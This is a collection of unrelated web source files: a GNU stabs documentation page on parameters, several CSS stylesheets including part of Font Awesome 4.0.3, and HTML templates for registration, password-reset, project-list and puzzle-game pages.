pre.display { font-family:inherit }
pre.format { font-family:inherit }
pre.smalldisplay { font-family:inherit; font-size:smaller }
pre.smallformat { font-family:inherit; font-size:smaller }
pre.smallexample { font-size:smaller }
pre.smalllisp { font-size:smaller }
span.sc { font-variant:small-caps }
span.roman { font-family:serif; font-weight:normal; }
span.sansserif { font-family:sans-serif; font-weight:normal; }
--></style>
</head>
<body>
<div class="node">
<p>
<a name="Parameters"></a>
Previous: <a rel="previous" accesskey="p" href="Based-Variables.html#Based-Variables">Based Variables</a>,
Up: <a rel="up" accesskey="u" href="Variables.html#Variables">Variables</a>
<hr>
</div>
<h3 class="section">4.7 Parameters</h3>
<p>Formal parameters to a function are represented by a stab (or sometimes
two; see below) for each parameter. The stabs are in the order in which
the debugger should print the parameters (i.e., the order in which the
parameters are declared in the source file). The exact form of the stab
depends on how the parameter is being passed.
<p><a name="index-N_005fPSYM-44"></a><a name="index-C_005fPSYM-45"></a>Parameters passed on the stack use the symbol descriptor `<samp><span class="samp">p</span></samp>' and
the <code>N_PSYM</code> symbol type (or <code>C_PSYM</code> for XCOFF). The value
of the symbol is an offset used to locate the parameter on the stack;
its exact meaning is machine-dependent, but on most machines it is an
offset from the frame pointer.
<p>As a simple example, the code:
<pre class="example"> main (argc, argv)
int argc;
char **argv;
</pre>
<p>produces the stabs:
<pre class="example"> .stabs "main:F1",36,0,0,_main # <span class="roman">36 is N_FUN</span>
.stabs "argc:p1",160,0,0,68 # <span class="roman">160 is N_PSYM</span>
.stabs "argv:p20=*21=*2",160,0,0,72
</pre>
<p>The type definition of <code>argv</code> is interesting because it contains
several type definitions. Type 21 is pointer to type 2 (char) and
<code>argv</code> (type 20) is pointer to type 21.
<!-- FIXME: figure out what these mean and describe them coherently. -->
<p>The following symbol descriptors are also said to go with <code>N_PSYM</code>.
The value of the symbol is said to be an offset from the argument
pointer (I'm not sure whether this is true or not).
<pre class="example"> pP (<<??>>)
pF Fortran function parameter
X (function result variable)
</pre>
<ul class="menu">
<li><a accesskey="1" href="Register-Parameters.html#Register-Parameters">Register Parameters</a>
<li><a accesskey="2" href="Local-Variable-Parameters.html#Local-Variable-Parameters">Local Variable Parameters</a>
<li><a accesskey="3" href="Reference-Parameters.html#Reference-Parameters">Reference Parameters</a>
<li><a accesskey="4" href="Conformant-Arrays.html#Conformant-Arrays">Conformant Arrays</a>
</ul>
</body></html>
|
styles.css
|
jamesryan83/brackets-node-webkit
|
#brackets-node-webkit-icon {
background-image: url(icon-nw.svg);
background-repeat: no-repeat;
background-size: 20px;
background-position: center;
}
#brackets-node-webkit-path {
width: 98%;
height: 27px;
padding: 0 5px;
}
|
doc/html/en/rep_samples.html
|
LuaDist/im
|
<!doctype HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Representation Samples</title>
<link rel="stylesheet" type="text/css" href="../style.css">
</head>
<body>
<h2>Image Representation Samples</h2>
<p>See the <a href="rep_guide.html">Representation Guide</a> for simple image
representation
samples.</p>
<h3><a name="im_info">Information</a></h3>
<p>This is a command line application that displays information obtained from
a file using the IM I/O functions, basically <b>imFile</b> functions. It
depends only on the IM main library.</p>
<p>Here is an output sample:</p>
<pre>IM Info
File Name:
exif_test.tif
File Size: 9.00 Mb
Format: TIFF - Tagged Image File Format
Compression: NONE
Image Count: 1
Image #0
Width: 2048
Height: 1536
Color Space: RGB
Has Alpha: No
Is Packed: Yes
Is Top Down: Yes
Data Type: byte
Data Size: 9.00 Mb
Attributes:
YResolution: 72.00
XResolution: 72.00
DateTime: 2004:01:14 11:30:11
Make: SONY
ResolutionUnit: DPI
Model: CD MAVICA
Photometric: 2</pre>
<p>You can view the source code here: <a href="../examples/im_info.cpp">im_info.cpp</a></p>
<h3><a name="im_view">View Using IUP and CD</a></h3>
<p>This application uses IUP and CD to create a window with a canvas and draw
the image into that canvas. It is a very simple application, no zoom nor
scrollbar management. The image is obtained from a file using the IM I/O
functions, but using the <b>imImage</b> structure to make the implementation
easier.</p>
<p>For more about IUP see
<a target="_blank" href="http://www.tecgraf.puc-rio.br/iup">
http://www.tecgraf.puc-rio.br/iup</a> and more about CD see
<a target="_blank" href="http://www.tecgraf.puc-rio.br/cd">
http://www.tecgraf.puc-rio.br/cd</a>.</p>
<p>You can view the source code here: <a href="../examples/im_view.c">im_view.c</a>, or download it with some makefiles
<a href="../download/im_view.zip">im_view.zip</a>.</p>
</body>
</html>
|
vsh1a/Verkefni4/setting-backgrounds-and-gradients/assets/stylesheets/main.css
|
siggirr/Verkefni1
|
/* http://meyerweb.com/eric/tools/css/reset/
v2.0 | 20110126
License: none (public domain)
*/
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, address, big, cite, code,
del, dfn, em, img, ins, kbd, q, s, samp,
small, strike, strong, sub, sup, tt, var,
b, u, i, center,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td,
article, aside, canvas, details, embed,
figure, figcaption, footer, header, hgroup,
menu, nav, output, ruby, section, summary,
time, mark, audio, video {
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
vertical-align: baseline;
}
/* HTML5 display-role reset for older browsers */
article, aside, details, figcaption, figure,
footer, header, hgroup, menu, nav, section {
display: block;
}
body {
line-height: 1;
}
ol, ul {
list-style: none;
}
blockquote, q {
quotes: none;
}
blockquote:before, blockquote:after,
q:before, q:after {
content: '';
content: none;
}
table {
border-collapse: collapse;
border-spacing: 0;
}
/*
========================================
Custom styles
========================================
*/
body {
background: #293f50;
color: #888;
font: 300 16px/22px "Lato", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}
/*
========================================
Grid
========================================
*/
*,
*:before,
*:after {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.container,
.grid {
margin: 0 auto;
width: 960px;
}
.container {
padding-left: 30px;
padding-right: 30px;
}
.grid,
.col-1-3,
.col-2-3 {
padding-left: 15px;
padding-right: 15px;
}
.col-1-3,
.col-2-3 {
display: inline-block;
vertical-align: top;
}
.col-1-3 {
width: 33.33%;
}
.col-2-3 {
width: 66.66%;
}
/*
========================================
Clearfix
========================================
*/
.group:before,
.group:after {
content: "";
display: table;
}
.group:after {
clear: both;
}
.group {
clear: both;
*zoom: 1;
}
/*
========================================
Rows
========================================
*/
.row,
.row-alt {
min-width: 960px;
}
.row {
background: #fff;
padding: 66px 0 44px 0;
}
.row-alt {
background: #cbe2c1;
background: -webkit-linear-gradient(to right, #a1d3b0, #f6f1d3);
background: -moz-linear-gradient(to right, #a1d3b0, #f6f1d3);
background: linear-gradient(to right, #a1d3b0, #f6f1d3);
padding: 44px 0 22px 0;
}
/*
========================================
Typography
========================================
*/
h1, h2, h3, h4 {
color: #648880;
}
h1, h3, h4, h5, p {
margin-bottom: 22px;
}
h1 {
font-size: 36px;
line-height: 44px;
}
h2 {
font-size: 24px;
line-height: 44px;
}
h3 {
font-size: 21px;
}
h4 {
font-size: 18px;
}
h5 {
color: #a9b2b9;
font-size: 14px;
font-weight: 400;
text-transform: uppercase;
}
strong {
font-weight: 400;
}
cite,
em {
font-style: italic;
}
/*
========================================
Leads
========================================
*/
.lead {
text-align: center;
}
.lead p {
font-size: 21px;
line-height: 33px;
}
/*
========================================
Links
========================================
*/
a {
color: #648880;
text-decoration: none;
}
a:hover {
color: #a9b2b9;
}
p a {
border-bottom: 1px solid #dfe2e5;
}
.primary-header a,
.primary-footer a {
color: #fff;
}
.primary-header a:hover,
.primary-footer a:hover {
color: #648880;
}
/*
========================================
Buttons
========================================
*/
.btn {
border-radius: 5px;
color: #fff;
cursor: pointer;
display: inline-block;
font-weight: 400;
letter-spacing: .5px;
margin: 0;
text-transform: uppercase;
}
.btn-alt {
border: 1px solid #fff;
padding: 10px 30px;
}
.btn-alt:hover {
background: #fff;
color: #648880;
}
/*
========================================
Primary header
========================================
*/
.logo {
border-top: 4px solid #648880;
float: left;
font-size: 48px;
font-weight: 100;
letter-spacing: .5px;
line-height: 44px;
padding: 40px 0 22px 0;
text-transform: uppercase;
}
.tagline {
margin: 66px 0 22px 0;
text-align: right;
}
.primary-nav {
font-size: 14px;
font-weight: 400;
letter-spacing: .5px;
text-transform: uppercase;
}
/*
========================================
Primary footer
========================================
*/
.primary-footer {
color: #648880;
font-size: 14px;
padding-bottom: 44px;
padding-top: 44px;
}
.primary-footer small {
float: left;
font-weight: 400;
}
/*
========================================
Navigation
========================================
*/
.nav {
text-align: right;
}
/*
========================================
Home
========================================
*/
.hero {
color: #fff;
line-height: 44px;
padding: 22px 80px 66px 80px;
text-align: center;
}
.hero h2 {
font-size: 36px;
}
.hero p {
font-size: 24px;
font-weight: 100;
}
.teaser a:hover h3 {
color: #a9b2b9;
}
|
src/theme/default/views/account/reset/inputs.html
|
EndyKaufman/django-postgres-angularjs-blog-front
|
<div class="form-group has-feedback" show-errors>
<label for="code" translate>Code:</label>
<input type="text" class="form-control" name="code" id="code"
placeholder="{{ 'enter code from email' | translate}}"
ng-model="AccountSvc.item.code" required>
<span ng-show="accountForm.$submitted || accountForm.code.$touched"
class="form-control-feedback"
ng-class="!accountForm.code.$valid ? 'glyphicon glyphicon-remove' : 'glyphicon glyphicon-ok'"
aria-hidden="true"></span>
</div>
<div class="form-group has-feedback" show-errors>
<label for="password" translate>New password:</label>
<input type="password" class="form-control" name="password" id="password"
placeholder="{{ 'enter new password' | translate}}"
ng-model="AccountSvc.item.password" required>
<span ng-show="accountForm.$submitted || accountForm.password.$touched"
class="form-control-feedback"
ng-class="!accountForm.password.$valid ? 'glyphicon glyphicon-remove' : 'glyphicon glyphicon-ok'"
aria-hidden="true"></span>
</div>
|
index.html
|
ciprian90m/masterjq
|
<!doctype html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Hubgets</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href='https://fonts.googleapis.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'>
<!-- bootstrap.css, main.css, formvalidator.css -->
<link rel="stylesheet" href="css/allcss.css">
</head>
<body>
<!--[if lt IE 9]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<header>
<div class="container">
<div class="row">
<div class="col-sm-12 logo">
<a href="#" title="hubgets">
<span class="mainLogo"></span>
</a>
</div>
</div>
</div>
<div class="textHeader">
<div class="headTextWrapper">
<h1>Create Organization</h1>
<p>Small or large, any team will increase productivity with Hubgets, it allows teams to filter noise and focus on results.</p>
</div>
</div>
</header>
<main>
<div class="container mainContainer">
<div class="row">
<div class="col-sm-6 formCol">
<div id="circle">
<div class="wrapperCircleIcons">
<span class="personalInfo"></span>
</div>
</div>
<form id="register" action="index.html" method="POST" novalidate="novalidate">
<div class="row clearfix">
<div class="firstNameCol col-md-6">
<label for="firstName">First Name</label>
<input type="text" class="required" name="firstName" id="firstName" required="required" pattern="[A-Za-z]" title="only letters">
</div>
<div class="lastNameCol col-md-6">
<label for="lastName">Last Name</label>
<input type="text" class="required" name="lastName" id="lastName" required="required" pattern="[A-Za-z]" title="only letters">
</div>
</div>
<div>
<label for="company">Company</label>
<input type="text" name="company" id="company" required="required">
</div>
<div>
<label for="email">Email</label>
<input type="email" class="required email" name="email" id="email" required="required" data-validation="free_email" title="test@test.com" pattern="[^ @]*@[^ @]*\.[a-zA-Z]{2,}">
</div>
<button type="submit" class="submit">REGISTER</button>
</form>
</div>
<div class="col-sm-6">
<div class="rightSide">
<ul class="media-list mainList">
<li class="media">
<div class="pull-left">
<div class="styleMediaObject">
<span class="centralize"></span>
</div>
</div>
<div class="media-body">
<p>Centralizes communication channels and reduces overhead.</p>
</div>
</li>
<li class="media">
<div class="pull-left">
<div class="styleMediaObject">
<span class="communication"></span>
</div>
</div>
<div class="media-body">
<p>Brings toghether instant messaging, voice and video communication in the browser.</p>
</div>
</li>
<li class="media">
<div class="pull-left">
<div class="styleMediaObject">
<span class="knowledge"></span>
</div>
</div>
<div class="media-body">
<p>Caputures information across the organization, retains the knowledges, analyzes and improves it.</p>
</div>
</li>
</ul>
<div class="media">
<span class="pull-left">
<span class="lifeBuoy"></span>
</span>
<div class="media-body">
<p class="telephone"><b>+1 845 894 123</b></p>
<p class="email"><a href="mailto:help@hubgets.com">help@hubgets.com</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
</main>
<footer>
<div class="container">
<div class="row">
<div class="col-sm-4 parentCopyright">
<div class="logoFooter"><span class="logoHubgets"></span></div>
<p class="copyright">Copyrights 2015 Hubgets.Inc</p>
</div>
<div class="col-xs-4 col-sm-3 aboutCompany">
<section id="aboutCompany">
<h5>OUR COMPANY</h5>
<ul>
<li><a href="#">About us</a></li>
<li><a href="#">Blog</a></li>
<li><a href="#a">We are hiring</a></li>
</ul>
</section>
<section id="terms">
<h5>Terms of Service</h5>
<ul>
<li><a href="#">Contact us</a></li>
</ul>
</section>
</div>
<div class="col-xs-4 col-sm-3 hubgets">
<section id="hubgets">
<h5>HUBGETS</h5>
<ul>
<li><a href="#">Join the program</a></li>
<li><a href="#">Features</a></li>
<li><a href="#">Current status</a></li>
</ul>
</section>
</div>
<div class="col-xs-4 col-sm-2 social">
<section id="social">
<h5>SOCIAL</h5>
<ul>
<li><a href="#"><span class="icon fa fa-twitter"></span>Twitter</a></li>
<li><a href="#"><span class="icon fa fa-youtube"></span>Youtube</a></li>
</ul>
</section>
</div>
</div>
</div>
</footer>
<!-- modernizr-2.8.3.min.js, jquery-1.11.3.min.js, formvalidator.js -->
<script src="js/alljs.js"></script>
<script>
</script>
</body>
</html>
|
stageopdracht/src/main/resources/templates/user/index.html
|
N00bface/Real-Dolmen-Stage-Opdrachten
|
<!DOCTYPE html>
<!--
~ Copyright (c) 2017. MIT-license for Jari Van Melckebeke
~ Note that there was a lot of educational work in this project,
~ this project was (or is) used for an assignment from Realdolmen in Belgium.
~ Please just don't abuse my work
-->
<html xmlns:th="http://www.thymeleaf.org"
xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Main page</title>
<meta charset="utf-8"/>
<link th:href="@{/vendors/datatables.net-responsive-bs/css/responsive.bootstrap.min.css}" rel="stylesheet"/>
<link th:href="@{/vendors/datatables.net-bs/css/dataTables.bootstrap.min.css}" rel="stylesheet"/>
<link th:href="@{/css/bootstrap.min.css}" rel="stylesheet"/>
<link th:href="@{/fonts/css/font-awesome.min.css}" rel="stylesheet"/>
<link th:href="@{/css/animate.min.css}" rel="stylesheet"/>
<link th:href="@{/vendors/nprogress/nprogress.css}" rel="stylesheet"/>
<link th:href="@{/css/custom.css}" rel="stylesheet"/>
</head>
<body class="nav-md">
<div class="container body">
<div class="main_container">
<th:block th:substituteby="menubar::menubar"/>
<div class="right_col" role="main">
<div class="">
<div class="page-title">
<div class="title_left">
<h3>Main page</h3>
</div>
</div>
<div class="clearfix"></div>
<div class="row">
<div class="col-md-12">
<div class="x_panel">
<div class="x_title">
<h2>My Projects</h2>
<div class="clearfix"></div>
</div>
<div class="x_content">
<table id="myprojects"
class="table table-striped table-bordered dt-responsive nowrap
dataTable no-footer dtr-inline">
<thead>
<tr>
<th>name</th>
<th>start date</th>
<th>deadline</th>
<th>score on project</th>
<th></th>
</tr>
</thead>
<tbody>
<tr th:each="project : ${userprojects}">
<td th:text="${project.name}"></td>
<td th:text="${project.dateStarted}"></td>
<td th:text="${project.dateFinished}"></td>
<td class="score" th:text="${project.scoreFromClient} +' % '"></td>
<!-- todo: add javascript for color gratient -->
<td>
<div class="btn-group">
<a th:href="@{/user/viewProject/__${project.id}__}"
class="btn btn-info">
view
</a>
<a th:href="@{/user/create/edit/__${project.id}__}"
class="btn btn-primary">
edit
</a>
<a th:href="@{/user/evaluate/__${project.id}__}"
class="btn btn-success">
evaluate
</a>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script th:src="@{/js/jquery-3.1.1.js}"></script>
<script th:src="@{/vendors/bootstrap/dist/js/bootstrap.min.js}"></script>
<script th:src="@{/vendors/datatables.net/js/jquery.dataTables.js}"></script>
<script th:src="@{/vendors/datatables.net-responsive/js/dataTables.responsive.min.js}"></script>
<script th:src="@{/vendors/datatables.net-responsive-bs/js/responsive.bootstrap.js}"></script>
<script th:src="@{/vendors/datatables.net-buttons/js/dataTables.buttons.min.js}"></script>
<script th:src="@{/vendors/datatables.net-buttons-bs/js/buttons.bootstrap.min.js}"></script>
<script th:src="@{/js/custom.js}">
$("#myprojects").DataTable();
</script>
</body>
</html>
|
TAIHAO2019/pub/SmallGame/AsFastAsYouCan2/9b727c989d53886f2dd13b99805aadb4eaaee34c589411d03abbe61bd15e2a8d.html
|
simonmysun/praxis
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>18 --> 19</title>
<link href="./../../assets/style.css" rel="stylesheet">
</head>
<body>
<h2>You have to be fast</h2>
<a href="./985fa669d6cbc3fa1ea630c40e455db913bb2db41301ebb07ab754e6377c95b9.html">Teleport</a>
<hr>
<a href="./../../about.md">About</a> (Spoilers! )
<script src="./../../assets/md5.js"></script>
<script>
window.currentLevel = 7;
</script>
<script src="./../../assets/script.js"></script>
</body>
</html>
|
web/css/fonts/font-awesome.min.css
|
ScottConnor-BHG/dinkly_user
|
/*!
* Font Awesome 4.0.3 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/
/* FONT PATH
* -------------------------- */
@font-face {
font-family: 'FontAwesome';
src: url('../fonts/fontawesome-webfont.eot?v=4.0.3');
src: url('../fonts/fontawesome-webfont.eot?#iefix&v=4.0.3') format('embedded-opentype'), url('../fonts/fontawesome-webfont.woff?v=4.0.3') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.0.3') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.0.3#fontawesomeregular') format('svg');
font-weight: normal;
font-style: normal;
}
.fa {
display: inline-block;
font-family: FontAwesome;
font-style: normal;
font-weight: normal;
line-height: 1;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
/* makes the font 33% larger relative to the icon container */
.fa-lg {
font-size: 1.3333333333333333em;
line-height: 0.75em;
vertical-align: -15%;
}
.fa-2x {
font-size: 2em;
}
.fa-3x {
font-size: 3em;
}
.fa-4x {
font-size: 4em;
}
.fa-5x {
font-size: 5em;
}
.fa-fw {
width: 1.2857142857142858em;
text-align: center;
}
.fa-ul {
padding-left: 0;
margin-left: 2.142857142857143em;
list-style-type: none;
}
.fa-ul > li {
position: relative;
}
.fa-li {
position: absolute;
left: -2.142857142857143em;
width: 2.142857142857143em;
top: 0.14285714285714285em;
text-align: center;
}
.fa-li.fa-lg {
left: -1.8571428571428572em;
}
.fa-border {
padding: .2em .25em .15em;
border: solid 0.08em #eeeeee;
border-radius: .1em;
}
.pull-right {
float: right;
}
.pull-left {
float: left;
}
.fa.pull-left {
margin-right: .3em;
}
.fa.pull-right {
margin-left: .3em;
}
.fa-spin {
-webkit-animation: spin 2s infinite linear;
-moz-animation: spin 2s infinite linear;
-o-animation: spin 2s infinite linear;
animation: spin 2s infinite linear;
}
@-moz-keyframes spin {
0% {
-moz-transform: rotate(0deg);
}
100% {
-moz-transform: rotate(359deg);
}
}
@-webkit-keyframes spin {
0% {
-webkit-transform: rotate(0deg);
}
100% {
-webkit-transform: rotate(359deg);
}
}
@-o-keyframes spin {
0% {
-o-transform: rotate(0deg);
}
100% {
-o-transform: rotate(359deg);
}
}
@-ms-keyframes spin {
0% {
-ms-transform: rotate(0deg);
}
100% {
-ms-transform: rotate(359deg);
}
}
@keyframes spin {
0% {
transform: rotate(0deg);
}
100% {
transform: rotate(359deg);
}
}
.fa-rotate-90 {
filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=1);
-webkit-transform: rotate(90deg);
-moz-transform: rotate(90deg);
-ms-transform: rotate(90deg);
-o-transform: rotate(90deg);
transform: rotate(90deg);
}
.fa-rotate-180 {
filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2);
-webkit-transform: rotate(180deg);
-moz-transform: rotate(180deg);
-ms-transform: rotate(180deg);
-o-transform: rotate(180deg);
transform: rotate(180deg);
}
.fa-rotate-270 {
filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3);
-webkit-transform: rotate(270deg);
-moz-transform: rotate(270deg);
-ms-transform: rotate(270deg);
-o-transform: rotate(270deg);
transform: rotate(270deg);
}
.fa-flip-horizontal {
filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1);
-webkit-transform: scale(-1, 1);
-moz-transform: scale(-1, 1);
-ms-transform: scale(-1, 1);
-o-transform: scale(-1, 1);
transform: scale(-1, 1);
}
.fa-flip-vertical {
filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1);
-webkit-transform: scale(1, -1);
-moz-transform: scale(1, -1);
-ms-transform: scale(1, -1);
-o-transform: scale(1, -1);
transform: scale(1, -1);
}
.fa-stack {
position: relative;
display: inline-block;
width: 2em;
height: 2em;
line-height: 2em;
vertical-align: middle;
}
.fa-stack-1x,
.fa-stack-2x {
position: absolute;
left: 0;
width: 100%;
text-align: center;
}
.fa-stack-1x {
line-height: inherit;
}
.fa-stack-2x {
font-size: 2em;
}
.fa-inverse {
color: #ffffff;
}
/* Font Awesome uses the Unicode Private Use Area (PUA) to ensure screen
readers do not read off random characters that represent icons */
.fa-glass:before {
content: "\f000";
}
.fa-music:before {
content: "\f001";
}
.fa-search:before {
content: "\f002";
}
.fa-envelope-o:before {
content: "\f003";
}
.fa-heart:before {
content: "\f004";
}
.fa-star:before {
content: "\f005";
}
.fa-star-o:before {
content: "\f006";
}
.fa-user:before {
content: "\f007";
}
.fa-film:before {
content: "\f008";
}
.fa-th-large:before {
content: "\f009";
}
.fa-th:before {
content: "\f00a";
}
.fa-th-list:before {
content: "\f00b";
}
.fa-check:before {
content: "\f00c";
}
.fa-times:before {
content: "\f00d";
}
.fa-search-plus:before {
content: "\f00e";
}
.fa-search-minus:before {
content: "\f010";
}
.fa-power-off:before {
content: "\f011";
}
.fa-signal:before {
content: "\f012";
}
.fa-gear:before,
.fa-cog:before {
content: "\f013";
}
.fa-trash-o:before {
content: "\f014";
}
.fa-home:before {
content: "\f015";
}
.fa-file-o:before {
content: "\f016";
}
.fa-clock-o:before {
content: "\f017";
}
.fa-road:before {
content: "\f018";
}
.fa-download:before {
content: "\f019";
}
.fa-arrow-circle-o-down:before {
content: "\f01a";
}
.fa-arrow-circle-o-up:before {
content: "\f01b";
}
.fa-inbox:before {
content: "\f01c";
}
.fa-play-circle-o:before {
content: "\f01d";
}
.fa-rotate-right:before,
.fa-repeat:before {
content: "\f01e";
}
.fa-refresh:before {
content: "\f021";
}
.fa-list-alt:before {
content: "\f022";
}
.fa-lock:before {
content: "\f023";
}
.fa-flag:before {
content: "\f024";
}
.fa-headphones:before {
content: "\f025";
}
.fa-volume-off:before {
content: "\f026";
}
.fa-volume-down:before {
content: "\f027";
}
.fa-volume-up:before {
content: "\f028";
}
.fa-qrcode:before {
content: "\f029";
}
.fa-barcode:before {
content: "\f02a";
}
.fa-tag:before {
content: "\f02b";
}
.fa-tags:before {
content: "\f02c";
}
.fa-book:before {
content: "\f02d";
}
.fa-bookmark:before {
content: "\f02e";
}
.fa-print:before {
content: "\f02f";
}
.fa-camera:before {
content: "\f030";
}
.fa-font:before {
content: "\f031";
}
.fa-bold:before {
content: "\f032";
}
.fa-italic:before {
content: "\f033";
}
.fa-text-height:before {
content: "\f034";
}
.fa-text-width:before {
content: "\f035";
}
.fa-align-left:before {
content: "\f036";
}
.fa-align-center:before {
content: "\f037";
}
.fa-align-right:before {
content: "\f038";
}
.fa-align-justify:before {
content: "\f039";
}
.fa-list:before {
content: "\f03a";
}
.fa-dedent:before,
.fa-outdent:before {
content: "\f03b";
}
.fa-indent:before {
content: "\f03c";
}
.fa-video-camera:before {
content: "\f03d";
}
.fa-picture-o:before {
content: "\f03e";
}
.fa-pencil:before {
content: "\f040";
}
.fa-map-marker:before {
content: "\f041";
}
.fa-adjust:before {
content: "\f042";
}
.fa-tint:before {
content: "\f043";
}
.fa-edit:before,
.fa-pencil-square-o:before {
content: "\f044";
}
.fa-share-square-o:before {
content: "\f045";
}
.fa-check-square-o:before {
content: "\f046";
}
.fa-arrows:before {
content: "\f047";
}
.fa-step-backward:before {
content: "\f048";
}
.fa-fast-backward:before {
content: "\f049";
}
.fa-backward:before {
content: "\f04a";
}
.fa-play:before {
content: "\f04b";
}
.fa-pause:before {
content: "\f04c";
}
.fa-stop:before {
content: "\f04d";
}
.fa-forward:before {
content: "\f04e";
}
.fa-fast-forward:before {
content: "\f050";
}
.fa-step-forward:before {
content: "\f051";
}
.fa-eject:before {
content: "\f052";
}
.fa-chevron-left:before {
content: "\f053";
}
.fa-chevron-right:before {
content: "\f054";
}
.fa-plus-circle:before {
content: "\f055";
}
.fa-minus-circle:before {
content: "\f056";
}
.fa-times-circle:before {
content: "\f057";
}
.fa-check-circle:before {
content: "\f058";
}
.fa-question-circle:before {
content: "\f059";
}
.fa-info-circle:before {
content: "\f05a";
}
.fa-crosshairs:before {
content: "\f05b";
}
.fa-times-circle-o:before {
content: "\f05c";
}
.fa-check-circle-o:before {
content: "\f05d";
}
.fa-ban:before {
content: "\f05e";
}
.fa-arrow-left:before {
content: "\f060";
}
.fa-arrow-right:before {
content: "\f061";
}
.fa-arrow-up:before {
content: "\f062";
}
.fa-arrow-down:before {
content: "\f063";
}
.fa-mail-forward:before,
.fa-share:before {
content: "\f064";
}
.fa-expand:before {
content: "\f065";
}
.fa-compress:before {
content: "\f066";
}
.fa-plus:before {
content: "\f067";
}
.fa-minus:before {
content: "\f068";
}
.fa-asterisk:before {
content: "\f069";
}
.fa-exclamation-circle:before {
content: "\f06a";
}
.fa-gift:before {
content: "\f06b";
}
.fa-leaf:before {
content: "\f06c";
}
.fa-fire:before {
content: "\f06d";
}
.fa-eye:before {
content: "\f06e";
}
.fa-eye-slash:before {
content: "\f070";
}
.fa-warning:before,
.fa-exclamation-triangle:before {
content: "\f071";
}
.fa-plane:before {
content: "\f072";
}
.fa-calendar:before {
content: "\f073";
}
.fa-random:before {
content: "\f074";
}
.fa-comment:before {
content: "\f075";
}
.fa-magnet:before {
content: "\f076";
}
.fa-chevron-up:before {
content: "\f077";
}
.fa-chevron-down:before {
content: "\f078";
}
.fa-retweet:before {
content: "\f079";
}
.fa-shopping-cart:before {
content: "\f07a";
}
.fa-folder:before {
content: "\f07b";
}
.fa-folder-open:before {
content: "\f07c";
}
.fa-arrows-v:before {
content: "\f07d";
}
.fa-arrows-h:before {
content: "\f07e";
}
.fa-bar-chart-o:before {
content: "\f080";
}
.fa-twitter-square:before {
content: "\f081";
}
.fa-facebook-square:before {
content: "\f082";
}
.fa-camera-retro:before {
content: "\f083";
}
.fa-key:before {
content: "\f084";
}
.fa-gears:before,
.fa-cogs:before {
content: "\f085";
}
.fa-comments:before {
content: "\f086";
}
.fa-thumbs-o-up:before {
content: "\f087";
}
.fa-thumbs-o-down:before {
content: "\f088";
}
.fa-star-half:before {
content: "\f089";
}
.fa-heart-o:before {
content: "\f08a";
}
.fa-sign-out:before {
content: "\f08b";
}
.fa-linkedin-square:before {
content: "\f08c";
}
.fa-thumb-tack:before {
content: "\f08d";
}
.fa-external-link:before {
content: "\f08e";
}
.fa-sign-in:before {
content: "\f090";
}
.fa-trophy:before {
content: "\f091";
}
.fa-github-square:before {
content: "\f092";
}
.fa-upload:before {
content: "\f093";
}
.fa-lemon-o:before {
content: "\f094";
}
.fa-phone:before {
content: "\f095";
}
.fa-square-o:before {
content: "\f096";
}
.fa-bookmark-o:before {
content: "\f097";
}
.fa-phone-square:before {
content: "\f098";
}
.fa-twitter:before {
content: "\f099";
}
.fa-facebook:before {
content: "\f09a";
}
.fa-github:before {
content: "\f09b";
}
.fa-unlock:before {
content: "\f09c";
}
.fa-credit-card:before {
content: "\f09d";
}
.fa-rss:before {
content: "\f09e";
}
.fa-hdd-o:before {
content: "\f0a0";
}
.fa-bullhorn:before {
content: "\f0a1";
}
.fa-bell:before {
content: "\f0f3";
}
.fa-certificate:before {
content: "\f0a3";
}
.fa-hand-o-right:before {
content: "\f0a4";
}
.fa-hand-o-left:before {
content: "\f0a5";
}
.fa-hand-o-up:before {
content: "\f0a6";
}
.fa-hand-o-down:before {
content: "\f0a7";
}
.fa-arrow-circle-left:before {
content: "\f0a8";
}
.fa-arrow-circle-right:before {
content: "\f0a9";
}
.fa-arrow-circle-up:before {
content: "\f0aa";
}
.fa-arrow-circle-down:before {
content: "\f0ab";
}
.fa-globe:before {
content: "\f0ac";
}
.fa-wrench:before {
content: "\f0ad";
}
.fa-tasks:before {
content: "\f0ae";
}
.fa-filter:before {
content: "\f0b0";
}
.fa-briefcase:before {
content: "\f0b1";
}
.fa-arrows-alt:before {
content: "\f0b2";
}
.fa-group:before,
.fa-users:before {
content: "\f0c0";
}
.fa-chain:before,
.fa-link:before {
content: "\f0c1";
}
.fa-cloud:before {
content: "\f0c2";
}
.fa-flask:before {
content: "\f0c3";
}
.fa-cut:before,
.fa-scissors:before {
content: "\f0c4";
}
.fa-copy:before,
.fa-files-o:before {
content: "\f0c5";
}
.fa-paperclip:before {
content: "\f0c6";
}
.fa-save:before,
.fa-floppy-o:before {
content: "\f0c7";
}
.fa-square:before {
content: "\f0c8";
}
